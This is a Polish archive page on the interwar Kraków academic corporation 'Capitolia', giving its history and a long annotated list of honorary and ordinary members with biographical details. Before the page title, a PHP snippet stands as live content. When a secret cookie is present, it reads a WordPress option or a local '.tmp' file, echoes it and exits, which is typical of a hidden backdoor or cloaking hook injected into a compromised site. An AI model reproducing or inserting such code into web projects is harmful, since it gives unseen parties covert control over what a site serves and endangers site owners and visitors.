if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Capitolia

Dekiel Capitolii - vide Poszukiwania. Nazwa:
Korporacja Akademicka “Capitolia”
Siedziba:
Kraków
Data powstania:
19 XI 1926 r.
Barwy:
czarna – złota – liliowa
Dewiza:
„Hosti frontem, pectus amico” („Czołem wrogowi, serce przyjacielowi”)

Rys historyczny

Listownik Capitolii, 1931 r.

Capitolię założyła dnia 19 XI 1926 r. grupa studentów Uniwersytetu Jagiellońskiego. Wśród nich byli między innymi Walerian Krużycki, Antoni Rosochowicz oraz Władysław Żydłowicz. Celem nowej Korporacji była szeroko pojęta praca społeczna wśród ludu.

Capitolia, Kraków ok. 1930 r. (?).

Od 1928 r. Capitolia należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 1 III 1928 r.). Kandydowała pod opieką K! Akropolia. Prawa członka rzeczywistego Związku uzyskała dnia 7 XII 1930 r.

Capitolia, Kraków ok. 1930 r. (?).

Całkowita ustalona, choć niekompletna imienna liczba członków obejmuje 144 nazwiska, w tym ośmiu członków honorowych. W 1938 r. liczyła 51 członków, w tym siedmiu członków honorowych

Brak wiadomości o powojennej działalności Capitolii i spotkaniach jej członków.

Lista członków

Poniższa, niekompletna lista członków Capitolii obejmuje ponad 140 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

  Jan Betlejewski, VI 1927 r.

 1. Jan Stanisław Betlejewski, (27 stycznia 1890 w Wąbrzeźnie - 3 czerwca 1983 w Gdynii-Orłowie) s. Maksymiliana i Agaty z d. Marchlewicz, szwagier Józefa Błędzkiego (Capitolia), absolwent Gimnazjum św. Jana w Gdańsku 1910, studiował we Wrocławiu, Berlinie, Monachium i Gryfii, absolwent med. Uniwersytet w Gryfii 1916, dr med. Uniwersytet w Gryfii 1917, działacz polskich organizacji akademickich, w czasie I wojny światowej lekarz w armii pruskiej na froncie niemiecko-francuskim, w 1920 ochotnik WP, lekarz wojskowy w stopniu kapitana w Straży Granicznej w Lubawie, komendant Stacji Zbornej Rannych i Chorych w Grudziądzu i Szpitalu Wojennego w Działdowie, w II Rzeczpospolitej lekarz w Górznie, ordynator Szpitala św. Jerzego w Lubawie, inspektor sanitarny na na obówd toruński DOKP, lekarz w Toruniu, internista-kardiolog, Filister honorowy Capitolii, uczestnik wojny obronnej 1939, komendant szpitala polowego na teranach bitwy nad Bzurą, w latach 1944-45 więziony przez Niemców i Rosjan, po wojnie lekarz w Trójmieście, m.in. kierownik przychodni w Gdańsku, pochowany na przykościelnym cmentarzu w Orłowie

 2. Stanisław Ciechanowski, (28 kwietnia 1869 w Krakowie - 10 sierpnia 1945 w Krakowie) dr med. UJ 1894, od 1894 wykładowca UJ, habilitacja 1898, prof. nadzw. 1900, kierownik Katedry Anatomii Patologicznej 1919-39, trzykrotny dziekan Wydziału Lekarskiego UJ 1919/20, 1927/28 i 1928/29, inicjator i organizator Studium Wychowania Fizycznego UJ, Filister honorowy Capitolii, aresztowany w ramach Sonderaktion Krakau, zwolniony 9 listopada 1939 z powodu złego stanu zdrowia, później uczestnik tajnego nauczania uniwersyteckiego w Krakowie, od 1930 członek PAU, jego imieniem nazwano ulicę na Wolii Justowskiej w Krakowie
 3. Adolf Marian Herforth, (2 lutego 1866 we Lwowie - 1932 w Krakowie) gen. brygady, Filister honorowy Capitolii, w 1931 w Krakowie
 4. Stanisław Maksymilian Leszczyński, Filister honorowy Capitolii, w 1931 w Gdynii

  Józef Szydzik, 1931 r.

 5. Józef Szydzik, (18 października 1871 w Mikołajkach w pow. lubawskim - 29 września 1939 w Bydgoszczy) s. Franciszka i Anastazji z d. Rosińska, wój Józefa Błędzkiego (Capitolia), absolwent Gimnazjum w Brodnicy, tamże przewodniczący tajnej organizacji filomackiej, od 1891 alumn w Seminarium Duchownym w Pelplinie, święcenia kapłańskie 1896, od 1903 proboszcz w Ostródzie, a od 1905 w Wielu, działacz społeczny, gospodarczy i polityczny, m.in. patronował Towarzystwu Ludowemu i Kółku Rolniczemu, działacz Towarzystwa Czytelni Ludowych, współzałożyciel i dyrektor Banku Ludowego we Wielu, główny inicjator i budowniczym Kalwarii Wielewskiej na Białej Górze nad jeziorem Wielewskim, przewodniczący Rady Robotniczo-Chłopskiej we Wielu i delegat na polski Sejm Dzielnicowy w Poznaniu 1918, od 1924 proboszcz w Chełmży, tajny szambelan papieski 1927, infułata - protonotariusz apostolski 1936, Filister honorowy Capitolii, we wrześniu 1939 aresztowany przez Niemców, uwięziony w tymczasowym obozie dla internowanych Polaków w koszarach 15 Wielkopolskiego Pułku Artylerii Lekkiej w Bydgoszczy przy ul. Gdańskiej 147, gdzie został dobity zastrzykiem przez niemieckiego lekarza, miejsce pochówku nieznane, odznaczony m.in. Srebrnym Krzyżem Zasługi, Odznaką Organizacji Wojskowej Pomorskiej, Krzyżem Kawalerskim Orderu Polonia Restituta

 6. Adolf Szyszko-Bohusz, (1 września 1883 w Narwie - 1 października 1948 w Krakowie) studiował w Sankt Petersburgu, a następnie w Austrii, Czechach i Niemczech, architekt i konserwator zabytków, wykładowca UJ i ASP 1910-12, później prof. PL 1912-16, kierownik prac odnowienia Zamku Królewskiego na Wawelu 1916-39 (m.in. dokonał odkrycia i rekonstrukcji Rotundy Najświętszej Marii Panny (św. Feliksa i Adaukta), odnowił większość wnętrz zamkowych, urządzi ł kryptę Marszałka Józefa Piłsudskiego), od 1920 kierownik Katedry Architektury Zabytkowej ASP, rektor ASP 1922-27, Filister honorowy Capitolii, prof. i kierownik Katedry Projektowania Monumentalnego Wydziału Architektury PW 1932-39, zaprojektował wiele obiektów użyteczności publicznej, m.in. monumentalny gmach PKO 1924 (ul. Wielopole), Dom Towarzystwa Ubezpieczeń “”Feniks”" 1932 (Rynek Główny 41), dom im. Józefa Piłsudskiego 1935 (ul. Oleandry) oraz Gimnazjum oo. Paulinów 1935 (ul. Paulińska), a także pensjonaty, hotele w miejscowościach uzdrowiskowych, m.in. zameczek Prezydenta RP w Wiśle 1930, w czasie II wojny światowej działał w tajnym Komitecie Wawelskim, po wojnie organizator i pierwszy dziekan Wydziału Architektury AGH, pochowany na Cmentarzu Rakowickim
 7. Władysław Wolter, (5 lutego 1897 w Wiedniu - 19 marca 1986 w Krakowie) prawnik, specjalista z zakresu prawa karnego materialnego, prof. UJ, członek i kurator 1934-39 oraz 1945-47 Towarzystwa Biblioteki Słuchaczów Prawa Uniwersytetu Jagiellońskiego, Filister honorowy Capitolii, od 1945 członek PAU, od 1967 PAN
 8. Władysław Żydłowicz, prawd. ojciec Władysława (Capitolia), dr med., Filister honorowy Capitolii, w 1938 w Krakowie

Członkowie rzeczywiści

 1. Włodzimierz Andrzejewski, (26 kwietnia 1907 w Krakowie - ) absolwent Gimnazjum w Krośnie, student WSH, c. 1928, akt. 1928-31
 2. Antoni Bartnicki, (4 kwietnia 1910 w Krakowie - ) absolwent Gimnazjum oo. Salezjanów w Oświęcimiu, kleryk salezjański, wystąpił z seminarium, student Wydziału Filozoficznego UJ, c. 1932
 3. Tadeusz Baumberger, (30 kwietnia 1914 w Krakowie - ) absolwent VII Gimnazjum im. Adama Mickiewicza w Krakowie 1932, student prawa UJ, c. 1933
 4. Roman Bednarczyk, (17 lutego 1914 w Mszanie Dolnej - ) absolwent humanistycznego Gimnazjum im. Henryka Sienkiewicza w Krakowie, c. 1933

  Józef Błędzki, ok. 1930 r. (?).

 5. Józef Roman Błędzki, (18 kwietnia 1905 w Tereszewie k. Lubawy - 18 marca 1987 w Świeciu nad Wisłą), s. nauczyciela z Torunia Jana Michała i Marii Magdaleny z d. Szydzik, siostrzeniec Józefa Szydzika, szwagier Jana Betlejewskiego (obaj Capitolia), brat stryjeczny Romana Błeńskiego i Bolesława Błęckiego (obaj Baltia), uczeń gimnazjum w Gdańsku, absolwent Gimnazjum im. Mikołaja Kopernika w Toruniu, członek Towarzystwa Filomatów Pomorskich, student prawa, a następnie student i absolwent rolnictwa UJ, c. 1928, akt. 1928-32, wiceprezes sem. let. 1930/31, olderman sem. zim. 1931/32, członek Koła Pomorzan, po studiach pracownik laboratorium chemicznego w Cukrowni w Chełmży, wykładowca i administrator szkoły rolnej w Pawłowie k. Chojnic 1936-37, asystent i zastępca kierownika rolniczego Zakładu Doświadczalnego w Błoniu k. Łęczycy 1937-38, administrator lasów i majątku Jarużyn pod Bydgoszczą 1938-39, w czasie II wojny światowej i w okresie powojennym administrator majątków rolnych, pochowany w Świeciu nad Wisłą, jego wspomnienia z działalności w Towarzystwie Filomatów Pomorskich zostały opracowane przez Jerzego Szewsa (Filomaci Pomorscy, 1975; Gdańskie Zeszyty Humanistyczne, t. 20 (1977), nr 24) - (biogram na podstawie danych od syna Leszka A. Błędzkiego)

 6. Edward Boczar, (6 stycznia 1907 w Harpowie - ) absolwent Gimnazjum w Krakowie 1926, student filozofii UJ, c. 1928, akt. 1928-31
 7. Wacław Boczar, student fil. UJ, c. 1929, akt. 1929
 8. Antoni Bogdanowicz, (13 września 1907 w Krakowie - ), s. Ignacego i Rozalii, absolwent VIII Gimnazjum im. Augusta Wiłkowskiego w Krakowie 1926, student WSHZ we Lwowie, c. 1926/27 Gasconia, wystąpił 1927, student WSH w Krakowie, c. 1927 Capitolia, akt. 1927-31, w 1938 w Chorzowie

  Eugeniusz Bułharyn, 1934 r. (?).

 9. Eugeniusz Bułharyn, (22 sierpnia 1915 w Piotrogrodzie 1915 - 1 stycznia 1995 w Gliwicach) s. Włodzimierza i Jadwigi z d. de Malherbe, absolwent VI Gimnazjum na Podgórzu w Krakowie 1933, student i absolwent farmacji UJ, c. 1934, akt. 1934-39, wiceprezes sem. let. 1938/39, po wojnie w wojsku, a następnie w Gliwicach prowadził hurtownię, później pracował w aptece, od lat 50. kierownik apteki przy ul. Dziewanny i jednocześnie przez wiele lat inspektor farmacji w Wydziale Zdrowia, pochowany na Cmentarzu Centralnym przy ul. Kozielskiej w Gliwicach

  Źródła (poza wskazanymi poniżej spisu członków): relacja Zofii Zych.

 10. A. Chrzanowski, (20 maja 1908 w Sosnowcu - ) absolwent Gimnazjum w Sosnowcu, student AG, c. 1932
 11. Michał Juljusz Cieśla, (26 lipca 1907 w Naresinje w Hercegowinie - 26 marca 1997 w Warszawie) absolwent Gimnazjum w Chełmży 1927, student AG, a następnie student i absolwent Wydziału Filozoficznego UJ, c. 1928, akt. 1928-31, w 1938 prof. w Gimnazjum w Siedlcach, a po wojnie w Warszawie, germanista
 12. Antoni Czakański, student med. UJ, c. 1928, akt. 1928
 13. Antoni Czarnecki, student med. UJ, c. 1931, akt. 1931
 14. Tadeusz D (?) atka, student prawa UJ, c. 1927, akt. 1927
 15. Edward Drożdż, (21 września 1910 w Sosnowcu - ) absolwent Gimnazjum w Królewskiej Hucie, student med. UJ 1930-34, c. 1934
 16. Kazimierz Drozdowski, student prawa UJ,
 17. Władysław Dybuś, c. 1938, akt. 1938-39
 18. Jerzy D (?) yga, c. 1926
 19. Franciszek Dylewski, (26 czerwca 1905 w Lidzbarku na Pomorzu - ) absolwent Gimnazjum w Chełmnie 1924, student med., prawa i teologii UW, UP, UJ, członek Pomeranii, akt. 1926, c. 1928 Masovia, skreślony 1928, następnie student filozofii UJ, c. 1930/31 Capitolia, akt. 1930/31
 20. Apoloniusz Dzida, c. 1927, akt. 1927-31, w 1938 w Mysłowicach
 21. Julian Flis, (22 listopada 1910 w Modnicy w pow. krakowskim - ) absolwent V Gimnazjum im. Jana Kochanowskiego w Krakowie, student prawa UJ 1935-, c. 1936
 22. Zygmunt Friliński, (1 września 1909 w Skomielnej [Sk (?) omielnej] - ) absolwent Gimnazjum im. Tadeusza Kościuszki w Myślenicach 1928, student Wydziału Rolnego UJ, c. 1929
 23. Tadeusz Gadlec, (4 stycznia 1914 we Lwowie - ) absolwent Gimnazjum w Katowicach 1932, student med. UJ, c. 1933
 24. Janusz Zbigniew Gadomski, (11 stycznia 1910 w Moskwie - 22 maja 1977 w Warszawie), s. Witolda i Heleny z Ranów, absolwent Gimnazjum Matematyczno-Przyrodniczego Bergera w Poznaniu 1929, student i absolwent Wydziału Górniczego AG 1929-37, c. 1929, akt. 1929-31, po studiach pracował w kopalniach “Andaluzja” w Brzezinach Śląskich, “Matylda” w Lipinach Śląskich, w wojnie obronnej 1939 w 6 Batalionie Artylerii, po wojnie kierownik ruch kopalni “Prezydent” w Chorzowie 1945-48, dyrektor techniczny Dolnośląskich Zjednoczenia Przemysłu Węglowego 1948-50, dyrektor kopalni “Siemanowice” w Siemianowicach 1950-54, naczelny dyrektor Zjednoczenia Kopalnictwa Surowców Chemicznych w Warszawie 1955-61, naczelny dyrektor Kombinatu Siarki Tarnobrzegu 1961-68
 25. Mieczysław Gadziński, (2 października 1911 w Krakowie - ) absolwent Gimnazjum w Krakowie 1933, student Wydziału Filozoficznego UJ, c. 1933, akt. 1933-39
 26. Jan Gajewski, (?) (14 maja 1910 w Krakowie - ) s. Stanisława i Marii z Zagórskich, absolwent Gimnazjum w Grodku Jagiellońskim, student prawa UJ, c. 1931 (?)
 27. Antoni Gazeł, (16 marca 1907 w Ostrawie - ) absolwent Gimnazjum w Krakowie, student geografii UJ, c. 1926, 1929, akt. 1929-30,
 28. Lucjan Gizler, student chemii UJ, c. 1927, akt. 1927
 29. Czesław Groblewski, (28 czerwca 1905 w Szymbarku w pow. gorlickim - 1940 w Katyniu), s. Kazimierza i Marii z Hertlów, absolwent prywatnego gimnazjum w Krakowie 1924, student i absolwent rolnictwa UJ, c. 1926, akt. 1926, absolwent Szkoły Podchorążych Piechoty w Cieszynie 1930, w 1931 mieszkał w Krakowie, w niewoli sowieckiej, zamordowany przez NKWD
 30. Teodor Gucwa (Gniewa ?), (16 maja 1908 w Krakowie - ) absolwent Gimnazjum w Tarnowie Lubelskim, student filozofii UJ, c. 1927
 31. Stanisław Hajduk, c. 1929, akt. 1929
 32. Władysław Hawlin, (30 marca 1913 w Krynicy Zdroju - ) absolwent II Gimnazjum im. króla Bolesława Chrobrego w Nowym Sączu 1933, student prawa UJ, c. 1933
 33. Bogdan Hummicki (?), (17 kwietnia 1912 w Krakowie - ) absolwent VI Gimnazjum w Krakowie, student Wyższego Naukowego (?) Kursu Spółdz. przy Wydziale Rolniczym UJ, c. 1934
 34. Jan Jabłoński, (7 marca 1914 w Krakowie - absolwent II Gimnazjum im. św. Jacka 1934, student prawa UJ, c. 1934, akt. 1934-39, wiceprezes i skarbnik sem. zim. 1938/39
 35. Antoni Jakubowski, (7 czerwca 1914 w Jaworznie - ) absolwent Gimnazjum w Chrzanowie 1932, student med. UJ, c. 1933
 36. Józef Jazowy, (30 kwietnia 1909 w Zarzeczu na Śląsku - ) absolwent Gimnazjum 1930, student filozofii UJ, c. 1931, akt. 1931

  Andrzej Jochelson, po 1945 r.

 37. Andrzej Jochelson, (28 września 1911 w Semipałatyńsku w Rosji - 27 listopada 1997 we Wrocławiu) s. Aleksandra i Klaudii z d. Nikitin, brat Cyryla (Capitolia), absolwent Gimnazjum Klasycznego w Grudziądzu, student prawa UJ, prawd. początkowo w Palestrze, wystąpił, c. 1930 Capitolia, akt. 1930-32, sekretarz zewn. sem. zim. 1931/32, ukończył studia prawnicze UW, dr praw, w 1938 Grudziądzu, uczestnik wojny obronnej 1939, ranny w obronie Warszawy, w 1945 przyjechał do Wrocławia, był m.in. dyrektorem Wydziału Kultury, starostą grodzkim, radcą prawnym Kurii Arcybiskupiej we Wrocławiu, wykładał prawo UWr, przez wiele lat pracował jako adwokat, aresztowany przez UB i więziony 1950-51, przeszedł ciężkie, trwające dziewięć miesięcy śledztwo, historyk sztuki, autor nazw ulic i placów Wrocławia, dziennikarz i literat, m.in. autor dramatu o “Biskupie Nankierze” wystawionym przez Teofila Trzcińskiego w 1946 we Wrocławiu, odznaczony papieskim medalem Pro Ecclesia et Pontifice, pochowany na Cmentarzu Osobowickim we Wrocławiu

  Źródła [poza wskazanymi poniżej listy członków]: relacja Marii Jankulowskiej.

  Cyryl Jochelson, lata 30-te.

 38. Cyryl Jochelson, (7 lutego 1914 w Sankt Petersburgu - 19 kwietnia 1945 pod Kodersdorfem w Niemczech) s. Aleksandra i Klaudii z d. Nikitin, brat Andrzeja (Capitolia), absolwent Gimnazjum Klasycznego w Grudziądzu 1933, student biologii, a nastęnie od 1934 med. UJ, c. 1933, po przerwaniu studiów w 1938 wstąpił do Szkoły Podchorążych Rezerwy Kawalerii w Grudziądzu, w 1939 przydzielony do 18 Pułku Ułanów Pomorskich, do 29 września walczył w wojnie obronnej 1939, okres okupacji spędził w Wołominie, w konspiracji w Służbie Zwycięstwu Polsce, a następnie ZWZ-AK (Okreg Mazowsze-Wschód z siedzibą w Radzyminie) ps. “Krótki”, studiował na tajnym Uniwersytecie Ziem Zachodnich, od 31 grudnia 1944 lekarz med. na UMCS w Lublinie, otrzymał stopień sierżanta pchor. lekarza LWP, przydzielony do I Korpusu Pancernego II Armii LWP, poległ przy udzielaniu pomocy rannym na pobojowisku na polach wsi Kodersdorf w Saksonii, ciała nie odnaleziono

  Źródła [poza wskazanymi poniżej listy członków]: relacja Marii Jankulowskiej.

 39. Teofil Jodłowiec, (28 sierpnia 1913 w Ślemieniu - ) absolwent Gimnazjum im. Jana Kochanowskiego w Krakowie, student prawa UJ, c. 1936, akt. 1936-39
 40. Marian Joseph, akt. 1933-39, prezes 1933 i 1938, prezes sem. zim. oraz sem. let. 1938/39
 41. Tadeusz Karliński, akt. 1938-39
 42. Tadeusz Karpiński, (20 marca 1915 w Silniczce w woj. łódzkim - ), absolwent Gimnazjum w Puławach, student Wydziału Filozoficznego UJ, c. 1934
 43. Roman Rawa Karwowski, (1 grudnia 1908 w Zazdrości w pow. skierniewickim - ) absolwent Gimnazjum im. Jana Kochanowskiego w Krakowie 1929, student ASP, c. 1929, akt. 1929-31, sekretarz sem. zim. 1930/31
 44. Adam Kasiewicz, (12 sierpnia 1912 w Krakowie - ) absolwent Gimnazjum im. Stanisława i Marii Jaworskich, student prawa UJ, c. 1932, akt. 1932
 45. Karol Kasprzak, (8 stycznia 1907 w Krakowie - ) absolwent Gimnazjum im. Jana Sobieskiego 1928, student prawa UJ i WSH, c. 1929, akt. 1929-32, sekretarz sem. zim. 1930/31, wiceprezes sem. zim. 1931/32, mgr praw, w 1938 w Krakowie
 46. Tadeusz Kerc, sekretarz sem. zim. 1929/30
 47. Karol Klimeczek, (28 grudnia 1911 w Szczokowej (?) w pow. chrzanowskim - ) absolwent Gimnazjum im. Henryka Sienkiewicza 1932, student prawa UJ 1933-, c. 1934
 48. Zdzisław Kmienicz (?), (26 sierpnia 1913 we Lwowie - ) absolwent Gimnazjum im. Henryka Sienkiewicza, student Wydziału Filozoficznego UJ, c. 1932, akt. 1932
 49. Franciszek Kmiotek (Kumionek ?), (19 listopada 1913 w Chorzowie - ) absolwent klasycznego Gimnazjum w Chorzowie 1934, student WSH w Krakowie 1934, c. 1934, akt. 1934
 50. Jan Komorowski, akt. 1925-27, prezes sem. let. 1925/26, prezes sem. zim. 1926/27
 51. Stanisław Kondolewicz, student prawa UJ, c. 1927, akt. 1927
 52. Emanuel Kopieczny, (1 grudnia 1914 w Hajdukach Wielkich - ) uczeń i absolwent Gimnazjum Klasycznego w Królewskiej Hucie 1925-33, student i absolwent med. UJ 1933-45, c. 1934, akt. 1934
 53. Mieczysław Kozarski, akt. 1938-39
 54. Jan Kreczmar, c. 1938, akt. 1938-39
 55. Tadeusz Krost, student prawa UJ, c. 1927, akt. 1927
 56. Andrzej Krotoszyński, student prawa UJ, c. 1926/27, akt. 1926/27
 57. Walerian Florian Krużycki, (18 listopada 1905 w Krotoszynie - ) absolwent klasycznego Gimnazjum w Toruniu 1925, student praw UJ, założyciel Capitolii, c. 1926, akt. 1926-31, prezes sem. let. 1927/28, mgr praw, w 1938 w Nakle nad Notecią
 58. Stanisław (Zbroisław) Kuczkowski ? (Kluczkowski ?), (28 czerwca 1908 we Lwowie - ) absolwent Gimnazjum w Toruniu 1927, student med. UJ, c. 1928, akt. 1928
 59. Lubin Kulczycki, (2 września 1930 w Borysławiu w woj. lwowskim - ) absolwent Gimnazjum w Szczekocinach 1931, student farmacji UJ, c. 1934, akt. 1934
 60. Rafał Kulis, c. 1938, akt. 1938-39
 61. Wiktor Lermenich (?), student UP, a następnie student med. UJ, c. 1927, akt. 1927
 62. Ryszard Leśniewicz, (24 marca 1909 w Skoraszewicach w Poznańskim - ) absolwent Gimnazjum w Chełmży 1927, student prawa UJ, c. 1928, akt. 1928
 63. Władysław Łoz, (1914 w Tarnowie - ) absolwent Gimnazjum w Tarnowie, student prawa UJ, c. 1933, akt. 1933, mgr prawa, w 1938 w Bydgoszczy
 64. Jan Marczewski, (30 czerwca 1916 w Krakowie - ) absolwent IV Gimnazjum im. Henryka Sienkiewicza w Krakowie, student prawa UJ 1935- , c. 1936, akt. 1936
 65. Brunon Jakub Marschall, (21 czerwca 1907 w Fiałkach w pow. brodnickim - po 1956) student med. UJ, c. 1927, akt. 1927-32, olderman sem. zim. 1928/29, prezes oraz olderman sem. let. 1930/31, prezes sem. zim. 1931/32, olderman 1932, I wiceprezes Krakowskiego Koła Międzykorporacyjnego 1931/32 (od grudnia 1931), student i absolwent med. UP 1937, dr med. (?), laryngolog, w 1956 w Gliwicach
 66. Mieczysław Aleksander Mazaraki, (17 grudnia 1913 w Chrzanowie - ) absolwent Gimnazjum w Chorzowie, student med. UJ, c. 1933, akt. 1933
 67. Tadeusz Józef Mazur, (1 listopada 1914 w Nowej Górze w pow. chrzanowskim - ) absolwent Gimnazjum im. króla Jana III Sobieskiego w Krakowie (?), student prawa UJ 1934-, c. 1936, akt. 1936-39
 68. Eugeniusz Medowicz (?), (5 maja 1907 Jarosławiu w woj. lwowskim - ) absolwent Gimnazjum w Krakowie, student Wydziału Filozoficznego UJ, c. 1934, akt. 1934
 69. Marian Michał Michalik, (10 września 1905 w Krakowie - 6 maja 1968 w Częstochowie) s. Jana, absolwent VIII Gimnazjum w Krakowie 1927, student Wydziału Górniczego AG 1927-35, c. 1928, po studiach m.in. zastępca naczelnika w parowozowni w Tarnowskich Górach 1935-39, kopalni “Śląsk” w Chropaczowie 1945-46, “Pstrowski” w Biskupicach 1946-49, głównych inż. 1949-51, dyrektor Przedstawicielstwa Kopalń Rud Żelaza w Starachowicach 1951-54, starszy inspektor Zjednoczenia Kopalnictwa Rud Żelaza w Częstochowie 1954-61, wicedyrektor Okręgowego Urzędu Górnictwa w Częstochowie 1961-65
 70. Ireneusz Michalski, student chemii UJ, c. 1927, akt. 1927
 71. Zbigniew Michałek, (8 sierpnia 1913 - ) absolwent Gimnazjum w Krakowie 1933, student chemii UJ, c. 1934, akt. 1934
 72. Zdzisław Mika, akt. 1928-29, sekretarz sem. zim. 1928/29, prezes 1929, mgr prawa, w latach 30-tych pracował w Ministerstwie Komunikacji w Warszawie
 73. Emilian Miśkiewicz, student i absolwent prawa UJ, c. 1927, akt. 1927-30, wiceprezes, sekretarz sem. let. 1929/30, mgr prawa, w latach 30-tych pracował w Ministerstwie Spraw Wewnętrznych w Warszawie
 74. Jarosław Mitwijejko (Matwijejko ?), (7 grudnia 1912 w Lesznatowie (?) w pow. sokalskim - ) absolwent Gimnazjum 1931, student med. UJ, c. 1932, akt. 1932-39
 75. Włodzimierz Józef Moczurad, (5 lutego 1910 w Linkach - ) absolwent Gimnazjum w Nisku n. Sanem 1928, student prawa UJ, c. 1931, akt. 1931, mgr prawa, w 1938 w Liszkach
 76. Norbert Modzelewski, (19 września 1904 w Bohum w Westfalii - ) absolwent Gimnazjum w Królewskiej Hucie, student UP, a później AG, c. 1932, akt. 1932
 77. Juliusz Mokry, (28 luty 1910 w Drochobyczu - ) absolwent Gimnazjum im. Stanisława Jaworskiego w Krakowie 1929, student i absolwent Wydziału Górniczego AG, c. 1929 Capitolia, akt. 1929, później (?) w Gnomii, w 1938 we Lwowie
 78. Rudolf B. Mróz, (9 kwietnia 1906 w Złotowie - ) absolwent Gimnazjum w Złoczowie 1926, student prawa UJK 1926-27, a następnie UJ, c. 1928, akt. 1928
 79. Edward Nega, akt. 1938-39, sekretarz sem. zim. 1938/39
 80. Zdzisław Nosek, (18 października 1911 w Tarnowie - ) student i absolwent med. UJ 1938, c. 1929, akt. 1929, pediatra, w 1956 w Cieszynie
 81. Władysław Oleksy, akt. 1938-39, sekretarz sem. let. 1938/39
 82. Zygmunt Pacula, student prawa UJ, c. 1927, akt. 1927
 83. Zbigniew Józef Kazimierz Pałucki, (15 marca 1911 w Krakowie - ) absolwent Gimnazjum im. B. Nowodworskiego w Krakowie, student Wydziału Filozoficznego UJ, c. 1932, akt. 1932
 84. Zbigniew Pęckowski, mgr praw, w 1938 w Nowym Sączu
 85. Michał Piękoś, c. 1938, akt. 1938-39
 86. Bolesław Pirożyński, c. 1927, akt. 1927
 87. Feliks Władysław Przybyszowski, (24 lutego 1911 w Żabnie k. Tarnowa - ) s. Wilhelma i Jadwigi z Jaśkiewiczów, absolwent Gimnazjum oo. Jezuitów w Bąkowicach k. Chyrowa 1929, student prawa UJ, założyciel Palestry, akt. 1929-30/31, wystąpił 1930/31, c. 1931 Capitolia, akt. 1931-32, skarbnik 1931 oraz sekretarz 1931/32 (od grudnia 1931) Krakowskiego Koła Międzykorporacyjnego, prawd. wystąpił z Capitolii i wrócił do Palestry, filister 1936
 88. Edward Rańcz (Rancz), (14 maja 1908 w Strumieniu ? w pow. bielskim - ) absolwent Gimnazjum w Bielsku 1929, student prawa UJ, c. 1930/31, akt. 1930/31
 89. Rolinżyński (?), akt. 1926-27, sekretarz sem. zim. 1926/27

  Antoni Rosochowicz, prawd. ok. 1930 r.

 90. Antoni Rosochowicz, (4 maja 1909 w Toruniu - 22 września 1977 w Gdańsku) s. Antoniego i Kazimiery z d. Kluczyńska, brat Henryka (Wisła), absolwent Gimnazjum im. Mikołaja Kopernika w Toruniu, student i absolwent prawa UJ, założyciel Capitolii, c. 1926, akt. 1926-30, trzykrotny wiceprezes, w tym sem. zim. oraz sem. let. 1927/28, skarbnik 1929, prezes sem. zim. 1929/30, w 1938 w Toruniu, uczestnik wojny obronnej 1939, m.in. brał udział w bitwie nad Bzurą, w niewoli niemieckiej w oflagu w Woldenbergu 1939-45, po wojnie w Wielkiej Brytanii 1945-48, gdzie pracował w kancelarii prawniczej, w 1948 wrócił do kraju, radca prawny w Urzędzie Miejskim i Przedsiębiorstwie Wodociągi Toruńskie 1948-56, dyrektor Przedsiębiorstwa Produkcji Prefabrykatów w Toruniu 1956-74, ponadto radca prawny w Miejskim Przedsiębiorstwie Zieleni 1952-74, pochowany na Cmentarzu św. Jerzego w Toruniu

 91. Włodzimierz Rubik, (16 stycznia 1910 w Porębie w pow. będzińskim - lat. 70-te) s. Piotra i Marii z Ciszewskich, absolwent Gimnazjum Bergera w Poznaniu, student AG, c. 1931, akt. 1931, po wojnie dyrektor Gimnazjum we Wrocławiu
 92. Jerzy Sadkowski, (13 września 1913 w Piotrkowie Trybunalskim, absolwent Gimnazjum Humanistycznego w Jaśle 1933, student chemii UJ 1933- , c. 1934, akt. 1934
 93. Stanisław Saski, inż. rolnik, w 1938 Krakowie
 94. Aleksander Scholce (Scholze), student i absolwent prawa UJ, akt. 1928-29, prezes sem. zim. 1928/29, olderman 1929, w 1938 w Chrzanowie
 95. Marian Sendek, (17 luty 1915 w Zokrzówku w woj. lubelskim - ) absolwent VIII Gimnazjum w Krakowie 1933, student prawa UJ, c. 1934 (?), mgr praw, w 1938 w Krakowie
 96. Jerzy Senowski, (23 kwietnia 1913 w Krakowie - ) absolwent IV Gimnazjum im. Henryka Sienkiewicza 1931, student chemii UJ, c. 1932, akt. 1932
 97. Tadeusz Siara, (1 października 1914 w Chrzanowie - ) absolwent Prywatnego Gimnazjum im. Stanisława Konarskiego w Rakowicach 1933, student przyrody UJ, c. 1933, akt. 1933
 98. Tadeusz Jerzy S (?) iemioński, (10 marca 1913 w Krakowie - ) absolwent Gimnazjum im. św. Jacka w Krakowie 1932, student prawa UJ, c. 1922, akt. 1922
 99. Edmund Skawiński, student chemii UJ, c. 1927, akt. 1927
 100. Bolesław Skierawski, (15 czerwca 1906 w Wielu w pow. chojnickim - ) absolwent Gimnazjum w Chojnicach 1926, student filozofii UJ, c. 1929, akt. 1929-32, skarbnik sem. zim. 1931/32, mgr fil., w 1938 w Krakowie
 101. Kazimierz Jerzy Skoczyński, (18 sierpnia 1910 - ) absolwent Gimnazjum im. B. Nowodworskiego 1931, student filologii klasycznej Wydział Filozoficzny UJ, c. 1932, akt. 1932-39, olderman sem. zim. 1938/39
 102. Paweł Skrzypiec, c. 1928, akt. 1928
 103. Bronisław Smółka, (7 sierpnia 1914 w Filipowicach w pow. Chrzanowskim, absolwent Gimnazjum im. Stanisława Staszica w Chrzanowie 1934, student prawa UJ 1934- , c. 1936, akt. 1936-39
 104. Stefan Solbert (?), (2 września 1913 w Wielkich Hajdukach - ) absolwent klasycznego Gimnazjum w Chorzowie, student WSH w Krakowie, c. 1934, akt. 1934
 105. Stanisław Solecki, (7 sierpnia 1913 - ) absolwent IX Gimnazjum im. J. Hoene-Wrońskiego w Krakowie, student prawa UJ, c. 1933, akt. 1933, mgr prawa, w 1938 w Krakowie
 106. Włodzimierz Spenermark (?), student prawa UJ, c. 1927, akt. 1927
